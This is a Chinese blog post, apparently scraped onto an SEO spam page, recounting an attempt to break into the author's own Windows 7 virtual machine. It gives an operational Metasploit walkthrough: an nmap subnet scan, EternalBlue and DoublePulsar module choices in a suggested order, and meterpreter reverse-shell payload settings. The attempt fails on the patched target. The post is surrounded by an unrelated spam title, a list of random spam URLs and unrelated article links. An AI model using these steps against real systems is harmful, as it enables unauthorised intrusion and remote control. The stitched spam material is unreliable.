当前位置: 首页 > wzjs >正文

seo查询官方网站关键词查找网站

seo查询官方网站,关键词查找网站,wordpress页面设计,dedecms企业网站模板免费下载今天用虚拟机的时候发现忘记密码了,服了,打一下,顺便记录一下sb经过。 最后是通过其本身镜像解决,或者用u盘做一个PE ✅第一步:工具准备 kali ( msfconsole美少妇 ) ✅第二步:漏洞扫描 nmap…

今天用虚拟机的时候发现忘记密码了,服了,打一下,顺便记录一下sb经过。

最后是通过其本身镜像解决,或者用u盘做一个PE

 

✅第一步:工具准备

  •  kali ( msfconsole美少妇 )

第二步:漏洞扫描

nmap -p 445,3389 192.168.200.0/24 -O

本来想用08_067,改用永恒之蓝

第三步: MS17-010 

🔎 打开Metasploit控制台

msfconsole

🔎查找漏洞模块

search eternalblue

👉 推荐选择

  • 第一次打:选择 0

use exploit/windows/smb/ms17_010_eternalblue //use 0

 这是最经典、最直接的永恒之蓝利用方式,最常用。

👉 0 模块打不进去:

  • 选择 1

use exploit/windows/smb/ms17_010_psexec //use 1

 它结合了 SMB 执行与永恒之蓝漏洞,有时能绕过部分系统限制。

👉 只检测:

  • 选择 3

use auxiliary/scanner/smb/smb_ms17_010 //use 3

检测目标是否存在漏洞

👉 如果目标已经被种下 DoublePulsar 后门:

  • 选择 4

use exploit/windows/smb/smb_doublepulsar_rce //use 4

利用植入的后门远程执行代码。

 最佳顺序推荐(保险打法):

  1. 先用 auxiliary/scanner/smb/smb_ms17_010 扫描确认

  2. exploit/windows/smb/ms17_010_eternalblue

  3. 如果不成功,改用 exploit/windows/smb/ms17_010_psexec

像不正常情况下像我就是知道win7并且开启了445我就直接打了先说

 

🔎找到后使用

use exploit/windows/smb/ms17_010_eternalblue  //use 0

🔎在 Metasploit 中,如果你想查看当前模块有哪些可设置的参数(选项),需要用命令:

设置攻击参数

set RHOSTS 192.168.200.128
set LHOST 你的攻击机IP
set LPORT 4444   # 端口随意,一般用 4444
set payload windows/x64/meterpreter/reverse_tcp

⚠ 如果目标系统是 32 位,可以改用:

set payload windows/meterpreter/reverse_tcp

查看配置是否正确:

show options

发起攻击

exploit

打不进去

选系统

还是打不进去

🔎为什么Win7(2009_2025)、开启445,结果却显示“不存在漏洞”?

🔎如何验证 SMBv1 是否真的开启?

可以用 smbclient工具列出 Windows 共享

smbclient -L //192.168.200.128 -N

如果 StateDisabled,那就无法利用永恒之蓝。

如果确认 SMBv1 被禁用,可以尝试:

攻击 SMBv2 协议相关漏洞,如:

  • SMB Signing 绕过

  • MS17-010 失败后可以尝试 ms17_010_psexec (编号1的模块)

use exploit/windows/smb/ms17_010_psexec

报错

[-] 192.168.200.128:445 - Unable to find accessible named pipe!

放弃,永恒之蓝(EternalBlue)利用的是 SMBv1 协议的漏洞(MS17-010),如果目标没有开启 SMB 服务(即使开放了 445 端口),那么永恒之蓝也无法成功利用

关键点:

  • 445端口开放:端口 445 本身只是 SMB 服务的端口,表示目标机器上可能开放了 SMB 服务,但并不意味着 SMB 服务一定处于可用状态。如果没有启用 SMB 服务,攻击就无法进行。

  • SMB 服务:攻击需要依赖 SMB 服务中的“命名管道”来进行漏洞利用。如果目标关闭了 SMB 服务或没有开放可用的命名管道,那么漏洞无法被触发。

总结起来,如果目标没有开启 SMB 服务,即使 445 端口开放,永恒之蓝也无法攻击成功

这个win7是打补丁的。

 

 

 


文章转载自:

http://QqyKtK7c.hrypL.cn
http://oBOSykwY.hrypL.cn
http://gQT1Y19m.hrypL.cn
http://cK7Z7aOq.hrypL.cn
http://cFXLZqtw.hrypL.cn
http://FFk3sGtG.hrypL.cn
http://xqvc27Fv.hrypL.cn
http://iMYeTf9W.hrypL.cn
http://kiyewY8I.hrypL.cn
http://ImZlFhlR.hrypL.cn
http://M0vXx9iK.hrypL.cn
http://IsoFUWbC.hrypL.cn
http://vvV1nvmI.hrypL.cn
http://wJcGn7Vz.hrypL.cn
http://7xtSGvTW.hrypL.cn
http://UjkJ5NEx.hrypL.cn
http://Xh1PX5IA.hrypL.cn
http://si5mls4u.hrypL.cn
http://kJrctudY.hrypL.cn
http://qoMwbTRp.hrypL.cn
http://ERfviXD8.hrypL.cn
http://Cs3oLORR.hrypL.cn
http://21v5cGlT.hrypL.cn
http://jwZVoCQz.hrypL.cn
http://MTHiSmS6.hrypL.cn
http://wRCbl9O0.hrypL.cn
http://dnryIrP7.hrypL.cn
http://DPtPZTbM.hrypL.cn
http://x5c2pWeF.hrypL.cn
http://nSK8VhuK.hrypL.cn
http://www.dtcms.com/wzjs/691968.html

相关文章:

  • 个人旅游网站建设方案深圳市注册公司需要什么条件
  • 做网站用什么服务器比较好如何创建软件app
  • c 手机网站开发工具wordpress软件根目录在哪里
  • 一条龙建站多少钱大地seo视频
  • 建设部网站查不到注册证怎么回事安卓开发环境
  • 网站建设叁金手指花总1上海大公司有哪些
  • 如何入侵自己做的网站做网站运营需要学什么软件
  • 郑州网站竞价托管企业网络营销推广案例
  • 什么网站可以做兼职销售小企业建站系统
  • 网站安全设计手机怎么自己设计图片
  • 湖南网站建设mxtia手机图片网站模板
  • 俄语好网站设计网站域名可以自己做吗
  • 网站开发需要考什么证书软件开发合同范本大全
  • 做yy头像的网站近几天发生的新闻大事
  • 门户网站建设需要多少钱发卡平台wordpress
  • 不同的网站有不同的风格湛江论坛
  • 杭州精高端网站建设北京地铁建设管理公司网站
  • html网站的规划与建设6怎么制作一个app应用
  • soho网站建设内蒙古工程建设招投标中心网站
  • 微信公众号内置手机网站网络文化经营许可证在哪里办
  • 常州建设安全员报名网站金融系统网站模板
  • 做暧嗳网站wordpress插件 2017
  • 做外单网站有哪些wordpress分享插件
  • 深圳市专业制作网站公司做网站用框架好吗
  • 门户网站开发意义yw55521can优物入口
  • 科技网站建设公司wordpress中文路径
  • 宋家庄网站建设网站的建设费用属于什么科目
  • 淮安做网站杨凯旅游网站设计说明
  • ui是做网站的吗免费cad图纸下载网
  • 高校网站建设评比标准温州vi设计公司